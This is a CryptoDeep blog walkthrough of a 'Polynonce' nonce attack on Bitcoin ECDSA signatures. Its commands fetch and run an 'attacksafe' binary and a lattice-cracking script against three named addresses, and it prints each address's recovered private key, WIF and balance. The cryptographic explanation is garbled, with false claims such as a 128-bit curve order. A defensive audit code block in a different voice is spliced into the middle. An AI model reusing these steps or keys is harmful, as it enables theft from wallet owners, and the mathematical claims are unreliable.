POLYNONCE ATTACK: we use BITCOIN signatures as a Polynomial to an arbitrarily high power of 128 bits to get a Private Key

By CryptoDeep | CRYPTODEEP | 17 Aug 2023

In this article, we will again touch on the topic “Bitcoin’s Critical Vulnerability” and use the brand new attack of 2023, “POLYNONCE ATTACK”, on all three examples. The very first mention of this attack is described in an article from “Kudelski Security”.

As a practical basis, we will take materials from our earlier article “Speed up secp256k1 with endomorphism”, where the values on the secp256k1 curve from Hal Finney, LAMBDA and BETA, hide the depth of uncertainty of Bitcoin elliptic curves.

We can reveal a lot `Binary number (4 digits): "1111" // Hex number: "F" //`

We also know perfectly well the order of the secp256k1 curve which consists of 128 bits Binary number (4 digits): “1111” // Hex number: “F” //

```
n = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
```

``1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111010111010101011101101110011100110101011110100100010100000001110111011111111010010010111101000110011010000001101100100000101000001``

We see that the polynomial as a unit in the binary code of an arbitrarily high degree of 128 bits modulo

`Speed up secp256k1 with endomorphism`

Given this fact, the initial bit of the Bitcoin private key will be Binary number (4 digits): “1111” // Hex number: “F” //

“Polynonce Attack on Bitcoin”

Consider an example with a Bitcoin Address:

1DxzwX4qC9PsWDSAzuWbJRzEwdGx3n9CJB

929d565c386a279cf7a0382ba48cab1f72d62e7cfb3ab97b4f211d5673bc4441

RawTX

``02000000019e3de154f8b473a796b9e39dd279dff1d907a4d27a1d8b23a055f97b08ad4c6e310000006b483045022100b29bdfc27ddf6bebd0e77c84b31dc1bc64b5b2276c8d4147421e96ef85467e8d02204ddd8ff0ffa19658e3b417be5f64d9c425a4d9fcd76238b8538c1d605b229baf0121027b06fe78e39ced37586c42c9ac38d7b2d88ccdd4cd1bb38816c0933f9b8db695ffffffff0169020000000000001600145fc8e854994406f93ea5c7f3abccc5d319ae2a3100000000``

Let’s go to the official website:  https://colab.research.google.com

Load the `HEX` data through the `echo` utility and save it to a file: RawTX.txt

``!echo '02000000019e3de154f8b473a796b9e39dd279dff1d907a4d27a1d8b23a055f97b08ad4c6e310000006b483045022100b29bdfc27ddf6bebd0e77c84b31dc1bc64b5b2276c8d4147421e96ef85467e8d02204ddd8ff0ffa19658e3b417be5f64d9c425a4d9fcd76238b8538c1d605b229baf0121027b06fe78e39ced37586c42c9ac38d7b2d88ccdd4cd1bb38816c0933f9b8db695ffffffff0169020000000000001600145fc8e854994406f93ea5c7f3abccc5d319ae2a3100000000' > RawTX.txt``

To implement the attack, we will use the software

`www.attacksafe.ru/software`

Access rights:

``!chmod +x attacksafe``

``ls``

Application:

``!./attacksafe -help``

```
-version:  software version
-list:     list of bitcoin attacks
-tool:     indicate the attack
-gpu:      enable gpu
-time:     work timeout
-server:   server mode
-port:     server port
-open:     open file
-save:     save file
-search:   vulnerability search
-stop:     stop at mode
-max:      maximum quantity in mode
-min:      minimum quantity per mode
-speed:    boost speed for mode
-range:    specific range
-crack:    crack mode
-field:    starting field
-point:    starting point
-inject:   injection regimen
-decode:   decoding mode
```

``!./attacksafe -version``

``Version 5.3.3. [ATTACKSAFE SOFTWARE, © 2023]``

`"ATTACKSAFE SOFTWARE"` includes all popular attacks on Bitcoin.

Let’s run a list of all attacks:

``!./attacksafe -list``

Let’s choose `-tool: polynonce_attack`

To get the specific `HEX` values `R,S,Z` for the `ECDSA` signature, we previously added the `RawTX` data through the `echo` utility to a text document and saved it as the file `RawTX.txt`


Launch  `-tool polynonce_attack` using software `“ATTACKSAFE SOFTWARE”`

``!./attacksafe -tool polynonce_attack -open RawTX.txt -save SignatureRSZ.csv``

We launched this attack from  `-tool polynonce_attack` and the result was saved to a file `SignatureRSZ.csv`

Now to see the successful result, open the file `SignatureRSZ.csv`

In order to calculate the private key to a Bitcoin Wallet from the file `SignatureRSZ.csv`, we will install SageMath

Earlier we published an article, download `tar-file`: sage-9.3-Ubuntu_20.04-x86_64.tar.bz2

```
!wget https://cryptodeeptech.ru/sage-9.3-Ubuntu_20.04-x86_64.tar.bz2
!tar -xf sage-9.3-Ubuntu_20.04-x86_64.tar.bz2
```

Let’s go through the directory:

``cd SageMath/``

``ls``

Run the Python script relocate-once.py with the command:

``!python3 relocate-once.py``

Move `"AttackSafe"` and `"SignatureRSZ.csv"` to the `"SageMath"` folder

```
!mv '/content/attacksafe' '/content/SageMath/attacksafe'
!mv '/content/SignatureRSZ.csv' '/content/SageMath/SignatureRSZ.csv'
```

``ls``

Download the script crack_weak_ECDSA_nonces_with_LLL.py from Dario Clavijo through the utility `wget`

``!wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/20PolynonceAttack/crack_weak_ECDSA_nonces_with_LLL.py``

Now let’s run `SageMath` with the command:

``!./sage -sh``

To calculate the private key to the Bitcoin Wallet, run the script crack_weak_ECDSA_nonces_with_LLL.py specifying the parameters `128 bits 4 sign`

``python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 128 4 > PrivateKey.txt``

``cat PrivateKey.txt``

Let’s open the file: `PrivateKey.txt`

We received the private key to the Bitcoin Wallet in `HEX` format

``PrivKey = 0xf0a3e31646ce147bbd79bb6e45e6e9c8c4e51c535918c9b4cdca9528eb62172d``

Check POLYNONCE for each ECDSA signature

To do this, use the code from GITHUB

Result:

We received four identical initial `128 bits`

```
POLYNONCE >> 93e43392cb31d5d1f75175ee64ce16b7 efc86216627af576c29c9c52a0fd10fe
POLYNONCE >> 93e43392cb31d5d1f75175ee64ce16b7 f88ff4c8a9ea4b61b1e087d0c0988826
POLYNONCE >> 93e43392cb31d5d1f75175ee64ce16b7 6849e83cd03d103bcc37aca8323c8d2f
POLYNONCE >> 93e43392cb31d5d1f75175ee64ce16b7 efc86216627af576c29c9c52a0fd10fe
```

Thanks to the values on the secp256k1 curve from Hal Finney, LAMBDA and BETA revealed to us the same initial `128 bits`, since the initial bits of the private key to the Bitcoin Wallet begin with `Binary number (4 digits): "1111" // Hex number: "F" //`
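A key owner can run the same kind of check against their own signer. The following is an added example, not the POLYNONCE.py script or any code from the page: with the private key known, each nonce follows from the signing equation, and nonces that share leading bits or signatures that repeat `r` point to a broken nonce generator. The key, messages, helper names (`sign`, `audit`, `h`) and the 16-bit `limit` are constructed for illustration.

```python
import hashlib

P = 2**256 - 2**32 - 977  # secp256k1 field prime
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141  # order n quoted on the page
G = (0x79be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798,
     0x483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8)

def ec_add(a, b):  # affine addition; None is the point at infinity
    if a is None or b is None:
        return a or b
    if a[0] == b[0] and (a[1] + b[1]) % P == 0:
        return None
    if a == b:
        m = 3 * a[0] * a[0] * pow(2 * a[1], -1, P)
    else:
        m = (b[1] - a[1]) * pow((b[0] - a[0]) % P, -1, P)
    x = (m * m - a[0] - b[0]) % P
    return x, (m * (a[0] - x) - a[1]) % P

def ec_mul(k, pt):  # double-and-add, used only to build sample signatures
    acc = None
    while k:
        if k & 1:
            acc = ec_add(acc, pt)
        pt, k = ec_add(pt, pt), k >> 1
    return acc

def sign(d, z, k):  # textbook ECDSA with a caller-chosen nonce (lab signer)
    r = ec_mul(k, G)[0] % N
    return r, pow(k, -1, N) * (z + r * d) % N, z
def recover_nonce(d, r, s, z):  # s = k^-1 (z + r d) mod n, solved for k
    return pow(s, -1, N) * (z + r * d) % N

def audit(d, sigs, limit=16):
    nonces = [recover_nonce(d, *sig) for sig in sigs]
    diff = 0
    for k in nonces[1:]:
        diff |= nonces[0] ^ k            # bits where any nonce differs
    bits = 256 - diff.bit_length()       # leading bits common to all nonces
    repeated = len({r for r, _, _ in sigs}) < len(sigs)
    return {"shared_prefix_bits": bits, "repeated_r": repeated, "weak": repeated or bits >= limit}

def h(*parts):  # constructed sample values derived from SHA-256
    return int.from_bytes(hashlib.sha256(repr(parts).encode()).digest(), "big")

D = h("lab key") % N                     # constructed key, not from the page
MSGS = [h("msg", i) for i in range(4)]   # constructed message hashes
WEAK = [sign(D, z, (0x0123456789abcdef << 192) | (i << 126) | (h(z) >> 130))
        for i, z in enumerate(MSGS)]     # nonces share their top 128 bits
GOOD = [sign(D, z, h(D, z) % N) for z in MSGS]  # hash-derived nonces
```

`audit(D, WEAK)` reports a 128-bit shared prefix, while `audit(D, GOOD)` does not flag the hash-derived nonces. If the signer normalises signatures to low-S, the recovered value can be n - k instead of k, so compare prefixes for both candidates.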

Let’s check the HEX of the private key:

Install the module `bitcoin`

``!pip3 install bitcoin``

Let’s run the code:

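```
from bitcoin import *

# Read the private key(s) from PrivateKey.txt, one HEX value per line
with open("PrivateKey.txt", "r") as f:
    content = f.readlines()

content = [x.strip() for x in content]

# Write "HEX:address" (compressed public key) for each value
outfile = open("PrivateKeyAddr.txt", "w")
for x in content:
    outfile.write(x + ":" + pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed")) + "\n")

outfile.close()
```

Let’s open the file: `PrivateKeyAddr.txt`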

`f0a3e31646ce147bbd79bb6e45e6e9c8c4e51c535918c9b4cdca9528eb62172d:1DxzwX4qC9PsWDSAzuWbJRzEwdGx3n9CJB`

```
ADDR: 1DxzwX4qC9PsWDSAzuWbJRzEwdGx3n9CJB
WIF:  L5HV2GiosXifcmijGCpFWdYiMRuXh4x4JVK29urGjfAWyasBYoDX
HEX:  f0a3e31646ce147bbd79bb6e45e6e9c8c4e51c535918c9b4cdca9528eb62172d
```

`BALANCE: $ 3699.40`

Let’s look at other examples:

`№2`

Consider example #2 with a Bitcoin Address:

137a6fqt13bhtAkGZWrgcGM98NLCotszR2

c1da9d117e15883ba41539f558ac870f53865ea00f68a8ff8bc7e8a9ee67099b

RawTX

``010000000103ebc5c4b817124d45ad15e398ec32e9b9b7549c1fc10300ecbf36648c3cb5d42c0000006a47304402204e97dae0ab6e4eee9529f68687907c05db9037d9fbdba78dd01a3338a48d95b602207794cb7aa308243dfbdd5c20225777cd6e01bd7c4f76bf36948aa29290129c2b0121036360352efcff6a823eabb25578a29392eab4d302955fd54ece900578d2ab83b8ffffffff0162020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000``

Let’s remove the files from the first example:

```
!rm RawTX.txt
!rm NoncesHEX.txt
!rm PrivateKey.txt
!rm SignatureRSZ.csv
```

Load the `HEX` data through the `echo` utility and save it to a file: RawTX.txt

```
!echo '010000000103ebc5c4b817124d45ad15e398ec32e9b9b7549c1fc10300ecbf36648c3cb5d42c0000006a47304402204e97dae0ab6e4eee9529f68687907c05db9037d9fbdba78dd01a3338a48d95b602207794cb7aa308243dfbdd5c20225777cd6e01bd7c4f76bf36948aa29290129c2b0121036360352efcff6a823eabb25578a29392eab4d302955fd54ece900578d2ab83b8ffffffff0162020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000' > RawTX.txt
```

Launch  `-tool polynonce_attack` using software `“ATTACKSAFE SOFTWARE”`

``!./attacksafe -tool polynonce_attack -open RawTX.txt -save SignatureRSZ.csv``

We launched this attack from  `-tool polynonce_attack` and the result was saved to a file `SignatureRSZ.csv`

Now to see the successful result, open the file `SignatureRSZ.csv`

Let’s run `SageMath` with the command:

``!./sage -sh``

To calculate the private key to the Bitcoin Wallet, run the script  crack_weak_ECDSA_nonces_with_LLL.py  specifying the parameters `128 bits 4 sign`

``python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 128 4 > PrivateKey.txt``

``cat PrivateKey.txt``

Let’s open the file: `PrivateKey.txt`

We received the private key to the Bitcoin Wallet in `HEX` format

``PrivKey = 0xff0178fa717374f7e74d43f00150748967ea04b64241ec10a10f62debb70868c``

Check POLYNONCE for each ECDSA signature

To do this, use the code from GITHUB

`https://github.com/demining/CryptoDeepTools/blob/main/20PolynonceAttack/example2/POLYNONCE.py`

Result:

We received four identical initial `128 bits`

```
POLYNONCE >> 5220dae0c281e1115b4dd69ea3500f70 c5f6da6334586ed2bdc88a05f37bcf95
POLYNONCE >> 5220dae0c281e1115b4dd69ea3500f70 6f82fbd847c138ab48e778135e908149
POLYNONCE >> 5220dae0c281e1115b4dd69ea3500f70 5541022f8aeac81e5ce62e018d1cd722
POLYNONCE >> 5220dae0c281e1115b4dd69ea3500f70 80e88efaff419ecd84d7ded17dc548a7
```

Thanks to the values on the secp256k1 curve from Hal Finney, LAMBDA and BETA revealed to us the same initial `128 bits`, since the initial bits of the private key to the Bitcoin Wallet begin with `Binary number (4 digits): "1111" // Hex number: "F" //`

Let’s check the HEX of the private key:

Let’s run the code:

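```
from bitcoin import *

# Read the private key(s) from PrivateKey.txt, one HEX value per line
with open("PrivateKey.txt", "r") as f:
    content = f.readlines()

content = [x.strip() for x in content]

# Write "HEX:address" (compressed public key) for each value
outfile = open("PrivateKeyAddr.txt", "w")
for x in content:
    outfile.write(x + ":" + pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed")) + "\n")

outfile.close()
```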

Let’s open the file: `PrivateKeyAddr.txt`

```
ADDR: 137a6fqt13bhtAkGZWrgcGM98NLCotszR2
WIF:  L5mQfFuzR3rzLtneJ7Tcv64JrHjCpK64UN4JRdGDxCUTbQ8NfHxo
HEX:  ff0178fa717374f7e74d43f00150748967ea04b64241ec10a10f62debb70868c
```

`BALANCE: $ 1133.73`

Let’s look at other examples:

`№3`

Consider example #3 with a Bitcoin Address:

1HxrEeC2X8UEcSvsemPJtTqrnbAetGWYUt

fa80af660fc444d87853137506df02e5c75e8c2bf75dc44589b60356867a6d98

RawTX

``01000000016eb80d35b08164302e49f88d8f86bf2827a91a5650149be38f4f73751ff41437060000006a473044022043d4c025a0f3be366a0d768c721b9b9191e0c3db6f2c6bfe34e8fb24af7f379102205a4fe2cc6944e00309c35619ff1242301b84d4728b863f97326f56dbd7a782220121027ccccf5f56ed78c2a761721ff3da0f76b792fbe4eae2ac73e7b4651bc3ef19cdffffffff01c057010000000000232103bec42e5d718b0e5b3853243c9bcf00dd671a335b0eb99fd8ca32f8d5784a9476ac00000000``

Let’s remove the files from the second example:

```
!rm RawTX.txt
!rm NoncesHEX.txt
!rm PrivateKey.txt
!rm SignatureRSZ.csv
```

Load the `HEX` data through the `echo` utility and save it to a file: RawTX.txt

```
!echo '01000000016eb80d35b08164302e49f88d8f86bf2827a91a5650149be38f4f73751ff41437060000006a473044022043d4c025a0f3be366a0d768c721b9b9191e0c3db6f2c6bfe34e8fb24af7f379102205a4fe2cc6944e00309c35619ff1242301b84d4728b863f97326f56dbd7a782220121027ccccf5f56ed78c2a761721ff3da0f76b792fbe4eae2ac73e7b4651bc3ef19cdffffffff01c057010000000000232103bec42e5d718b0e5b3853243c9bcf00dd671a335b0eb99fd8ca32f8d5784a9476ac00000000' > RawTX.txt
```

Launch  `-tool polynonce_attack` using software `“ATTACKSAFE SOFTWARE”`

``!./attacksafe -tool polynonce_attack -open RawTX.txt -save SignatureRSZ.csv``

We launched this attack from  `-tool polynonce_attack` and the result was saved to a file `SignatureRSZ.csv`

Now to see the successful result, open the file `SignatureRSZ.csv`

Let’s run `SageMath` with the command:

``!./sage -sh``

To calculate the private key to the Bitcoin Wallet, run the script  crack_weak_ECDSA_nonces_with_LLL.py  specifying the parameters `128 bits 4 sign`

``python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 128 4 > PrivateKey.txt``

``cat PrivateKey.txt``

Let’s open the file: `PrivateKey.txt`

We received the private key to the Bitcoin Wallet in `HEX` format

``PrivKey = 0xfbc50a7158b3d9fd7fd58fe0874f20c10c650975dc118163debf442a44203fdf``

Check POLYNONCE for each ECDSA signature

To do this, use the code from GITHUB

Result:

We received four identical initial `128 bits`

```
POLYNONCE >> d7460c5b1a98f6d0443ae1cfe1f17814 fbc50a7158b3d9fd7fd58fe0874f20c1
POLYNONCE >> d7460c5b1a98f6d0443ae1cfe1f17814 d4de8d539655ecf0d50fd32187c3c467
POLYNONCE >> d7460c5b1a98f6d0443ae1cfe1f17814 6726aea1a6fd64d82dc657670352de72
```

Thanks to the values on the secp256k1 curve from Hal Finney, LAMBDA and BETA revealed to us the same initial `128 bits`, since the initial bits of the private key to the Bitcoin Wallet begin with `Binary number (4 digits): "1111" // Hex number: "F" //`

Let’s check the HEX of the private key:

Let’s run the code:

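```
from bitcoin import *

# Read the private key(s) from PrivateKey.txt, one HEX value per line
with open("PrivateKey.txt", "r") as f:
    content = f.readlines()

content = [x.strip() for x in content]

# Write "HEX:address" (compressed public key) for each value
outfile = open("PrivateKeyAddr.txt", "w")
for x in content:
    outfile.write(x + ":" + pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed")) + "\n")

outfile.close()
```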

Let’s open the file: `PrivateKeyAddr.txt`

```
ADDR: 1HxrEeC2X8UEcSvsemPJtTqrnbAetGWYUt
WIF:  L5f7p5bReuXLm3d7rFkpPyGQ1GNpiGuj8QuQ6rNCKXC9bs3J9GEY
HEX:  fbc50a7158b3d9fd7fd58fe0874f20c10c650975dc118163debf442a44203fdf
```

`BALANCE: $ 459.24`

Literature:

• A Novel Related Nonce Attack for ECDSA, Marco Macchetti [Kudelski Security, Switzerland] (2023)
• Gallant, Robert P., Robert J. Lambert, and Scott A. Vanstone. “Faster point multiplication on elliptic curves with efficient endomorphisms”. Annual International Conference on Cryptology, pp. 190–200. Springer, Berlin, Heidelberg, (2001)
• Hankerson, Darrell, Alfred J. Menezes, and Scott Vanstone. “A Guide to Elliptic Curve Cryptography”. Computer Reviews 46, no. 1 (2005)
• Hal Finney. bitcointalk – “Acceleration of signature verification”. (2011) https://bitcointalk.org/index.php?topic=3238.0
• Blahut, Richard E. “Cryptography and Secure Communication”. Cambridge University Press, (2014)

Source

ATTACKSAFE SOFTWARE

Telegram: https://t.me/cryptodeeptech

Video: https://youtu.be/7nKs_KHtyn4

Source: https://cryptodeeptech.ru/polynonce-attack
